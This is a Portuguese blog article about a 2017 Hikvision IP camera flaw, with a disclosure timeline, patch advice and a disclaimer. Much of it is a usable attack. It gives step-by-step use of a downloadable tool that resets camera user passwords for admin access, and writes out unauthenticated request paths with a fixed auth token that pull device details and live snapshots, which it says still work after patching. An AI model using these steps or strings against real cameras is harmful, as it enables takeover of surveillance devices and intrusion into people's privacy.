Já imaginou um software que permite você digitar o endereço IP e a porta de uma câmera de segurança e ter acesso como administrador ?
Esse software existe, ele foi criado para explorar uma falha que existe nas câmeras IPs fabricadas pela Hikvison. Veja os detalhes nesse artigo.

O software precisa somente das informações de endereço e porta (http) câmera e com isso pode ler quais são os usuários internos e definir uma nova senha.
A invasão pode ser feita em cerca de 5 segundos e permite acesso de administrador ao dispositivo.
Em março de 2017 foi descoberta uma falha de segurança nas câmeras IPs da Hikvision que permite o acesso direto às informações do dispositivo como modelo,número de série, versão de firmware e usuários.
O problema foi reportado para a Hikvision em 6 de março de 2017, que prontamente investigou o problema e admitiu a existência da falha.
Em 5 dias a Hikvision liberou uma correção para o problema da invasão que pode ser realizada com esse software, porém as câmeras que estiverem utilizando o firmware antigo estarão vulneráveis a esse problema.
Como usar o software para invadir a câmera
Com o uso do sofware, ter acesso às câmeras como administrador é muito simples, basta seguir os passos abaixo:
1. Digitar o endereço IP e porta
2 clicar em "Get User List"
3. Clicar no usuário para o qual deseja trocar a senha
4. Clicar em "Set Password for selected user"

Como corrigir a falha de segurança ?
Simples, basta atualizar o firmware da câmera para corrigir a falha de segurança das câmeras da Hikvision, um procedimento bem rápido que pode ser realizado em questão de alguns minutos.
O firmware corrige 100% do problema ?
Não corrige. Ainda é possivel enviar um comando para a câmera para retornar as informações do dispositivo e tirar uma foto. Isso ainda pode ser considerado como algo crítico por se tratar de um sistema de segurança.
Abaixo um exemplo do comando enviado para a câmera sem a necessidade de saber qual o usuário e a senha, esses parâmetros são passados depois do endereço e porta da câmera:
System/deviceInfo?auth=YWRtaW46MTEK Esse comando retorna as informações do dispositivo, note abaixo um exemplo do que é possível ver em uma câmera, o que inclui o nome, localização, modelo, número serial, MAC Address e versão de firmware utilizado.
<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<deviceName>IP CAMERA</deviceName>
<deviceID>88</deviceID>
<deviceDescription>IPCamera</deviceDescription>
<deviceLocation>hangzhou</deviceLocation>
<systemContact>Hikvision.China</systemContact>
<model>DS-2CD2420F-IW</model>
<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>
<macAddress>a4:14:37:xx:xx:xx</macAddress>
<firmwareVersion>V5.4.5</firmwareVersion>
<firmwareReleasedDate>build 170123</firmwareReleasedDate>
<bootVersion>V1.3.4</bootVersion>
<bootReleasedDate>100316</bootReleasedDate>
<hardwareVersion>0x0</hardwareVersion>
</DeviceInfo>
Abaixo um exemplo do comando enviado para a câmera para que uma foto seja tirada e exibida na tela:
onvif-http/snapshot?auth=YWRtaW46MTEK Esse comando retorna uma foto da câmera sem a necessdade de saber o usuário e senha.
Abaixo um exemplo de uma foto tirada em uma câmera online, sem a necessidade de usar o usuário e senha.
(clique na imagem para ampliar)

IMPORTANTE: No momento que estou escrevendo esse artigo, o firmware não corrigiu o problema de execução dos dois comandos, o que pode ser considerado crítico, veja abaixo a lista dos modelos e firmware
A primeira coluna mostra os modelos, a segunda coluna mostra a versão do firmware que possui problema, por exemplo da versão V5.2.0 build 140721 até a versão V5.4.0 Build 160530. E a última coluna mostra a partir de qual versão de firmware o problema é corrigido.

Demonstração prática do problema
Assista o vídeo abaixo que mostra na prática a exploração da falha de segurança das câmeras da Hikvision. Note que a câmera está online e localizada em alguma dependência da empresa.
Importante: Não recomendo nenhuma prática de invasão de câmeras de terceiros, o procedimento que realizo no vídeo é somente para fins de alertar as pessoas da vulnerabilidade. A câmera utilizada como exemplo está disponível para acesso pela Internet como demonstração, por esse motivo não há nenhum acesso não permitido ou indevido.
CLIQUE ABAIXO PARA VER O VÍDEO

Seria uma "backdoor" nas câmeras IPs ?
Há uma discussão em torno do tema, alguns acham que a possibilidade de acesso às câmeras foi deixada de forma intencional, a Hikvision no entanto afirma que foi somente um código de teste que estava na câmera e foi esquecido acidentalmente pelos programadores.
Essa forma de acesso é considerada como uma "porta dos fundos" tão popularmente conhecida como "backdoor" e pode comprometer totalmente a segurança do dispositivo. A Hikvision no entanto nega que seja o caso.
Onde baixar o software para testes ?
Abaixo você poderá encontrar o botão com o link para o software para fazer os testes com acesso às câmeras, o uso do software é de sua responsabilidade e não deve em hipótese alguma ser utilizado para invadir câmeras de terceiros sem a devida autorização. Use-o para testar e corrigir seus problemas e de clientes.